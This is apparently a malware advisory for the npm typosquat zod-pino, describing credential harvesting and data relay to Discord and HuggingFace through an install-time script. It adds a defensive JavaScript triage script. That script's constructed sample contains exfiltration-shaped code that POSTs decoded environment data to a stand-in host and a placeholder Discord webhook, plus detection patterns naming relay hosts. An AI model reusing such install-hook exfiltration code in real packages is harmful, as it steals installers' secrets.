MAL-2026-6273

Malicious code in zod-pino (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (94af4e18fa0fdc7c6aa17842c0dcea9d8ac7632a915cedb0d2150470d07c4e02)

Package name typosquats the popular `pino` logger family and `zod` validation library, but the shipped code is unrelated to logging or schema validation. The tarball contains:

1. `dist/secretScan/contentScanner.js` and `dist/secretScan/agentStartupAudit.js`, which scan for secrets and post results to `https://huggingface.co` endpoints;
2. `dist/hfCredentials.js`, which decodes base64-embedded credentials (`Buffer.from(..., 'base64')` at line 50);
3. `dist/discordRelayUpload.js`, which performs base64 decoding and POSTs data to Discord-relay endpoints (POST calls at lines 306/321/398, base64 buffers at lines 461/536);
4. `dist/deploymentDefaults.js`, holding multiple base64-encoded blobs decoded at runtime;
5. `scripts/postinstall-agent.mjs`, an install-time agent script with network/GET behavior;
6. `scripts/encode-deployment.mjs`, the author's encoder for the embedded blobs.

The combination of an install-time agent script, base64-obfuscated configuration/credentials, and exfiltration-shaped relays to Discord and HuggingFace under a name that mimics legitimate logging/validation packages is a credential-harvest and data-relay supply-chain attack against installers.
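The indicator combination the source describes (an install-time lifecycle script, runtime base64 decoding, and outbound requests to relay-style hosts) can be triaged statically before a package is ever installed. The following is an added example written for this page; it is not code from the advisory, from amazon-inspector, or from the zod-pino package. It works on an in-memory map of file paths to contents so it runs offline, the regular expressions are heuristics rather than a complete detector, and the two sample packages (including their file names and contents) are constructed for the example and do not reproduce the real package's code.

```javascript
'use strict';
// Added example, not code from the advisory or from the zod-pino package:
// static triage of an unpacked npm tarball for the indicator combination the
// record describes (install-time lifecycle script + runtime base64 decoding +
// outbound network calls to relay-style hosts).
// `files` is an in-memory map { relativePath: fileContents } so the example
// runs offline; reading a real tarball into that shape is left to the caller.

const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
// Buffer.from(<expr>, 'base64') or atob(...): data decoded at runtime.
const BASE64_DECODE = /Buffer\.from\(\s*[^)]*,\s*['"]base64['"]\s*\)|\batob\s*\(/;
// Common Node/browser ways to make an outbound request.
const NETWORK_CALL = /\bfetch\s*\(|\bhttps?\.(?:request|get)\s*\(|\baxios\b|XMLHttpRequest/;
// Hosts the advisory names as exfiltration relays.
const RELAY_HOSTS = /discord(?:app)?\.com|huggingface\.co/;

function triagePackage(files) {
  const findings = [];

  // 1. Lifecycle scripts run automatically on `npm install`.
  if (files['package.json'] !== undefined) {
    let scripts = {};
    try {
      scripts = JSON.parse(files['package.json']).scripts || {};
    } catch (e) {
      findings.push({ kind: 'unparseable-package-json' });
    }
    for (const hook of INSTALL_HOOKS) {
      if (typeof scripts[hook] === 'string') {
        findings.push({ kind: 'install-hook', hook, command: scripts[hook] });
      }
    }
  }

  // 2. Source files that both decode base64 and talk to the network, and any
  //    file that names a known relay host.
  for (const [path, content] of Object.entries(files)) {
    if (!/\.[cm]?js$/.test(path)) continue;
    const decodes = BASE64_DECODE.test(content);
    const network = NETWORK_CALL.test(content);
    if (decodes && network) findings.push({ kind: 'decode-and-network', path });
    if (RELAY_HOSTS.test(content)) findings.push({ kind: 'relay-host', path });
  }
  return findings;
}

// Collapse findings into a verdict: any single indicator warrants review;
// all three together (the pattern in this advisory) warrants blocking.
function summarize(findings) {
  const installHook = findings.some((f) => f.kind === 'install-hook');
  const decodeAndNetwork = findings.filter((f) => f.kind === 'decode-and-network').length;
  const relayHost = findings.filter((f) => f.kind === 'relay-host').length;
  let verdict = 'clean';
  if (installHook || decodeAndNetwork > 0 || relayHost > 0) verdict = 'review';
  if (installHook && decodeAndNetwork > 0 && relayHost > 0) verdict = 'block';
  return { installHook, decodeAndNetwork, relayHost, verdict };
}

// Constructed sample mimicking the shape the advisory describes. File names
// and contents are invented for this example; they are not the real package.
const SUSPICIOUS_SAMPLE = {
  'package.json': JSON.stringify({
    name: 'example-typosquat',
    version: '0.0.1',
    scripts: { postinstall: 'node scripts/postinstall-agent.mjs' },
  }),
  'scripts/postinstall-agent.mjs':
    "import https from 'node:https';\n" +
    "const cfg = Buffer.from(process.env.CFG || '', 'base64').toString();\n" +
    "https.get('https://relay.example.invalid/' + cfg, () => {});\n",
  'dist/relay.js':
    "const blob = Buffer.from(process.env.BLOB || '', 'base64');\n" +
    "fetch('https://discord.com/api/webhooks/PLACEHOLDER', { method: 'POST', body: blob });\n",
};

// Constructed benign sample: a thin logger wrapper with no lifecycle scripts.
const BENIGN_SAMPLE = {
  'package.json': JSON.stringify({ name: 'example-logger-wrapper', version: '1.0.0' }),
  'index.js': "const pino = require('pino');\nmodule.exports = pino({ level: 'info' });\n",
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const [label, files] of [['suspicious', SUSPICIOUS_SAMPLE], ['benign', BENIGN_SAMPLE]]) {
    console.log(label, JSON.stringify(summarize(triagePackage(files))));
  }
}
```

Running the file prints `block` for the constructed suspicious package and `clean` for the benign one. The verdict deliberately keys on the co-occurrence of indicators: a postinstall script or a base64 decode on its own is common in legitimate packages, while all three together under a typosquatted name is the pattern this record documents.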

Affected packages

npm / zod-pino

No fixed version published yet for zod-pino (npm). Pin to a known-safe version or switch to an alternative.

References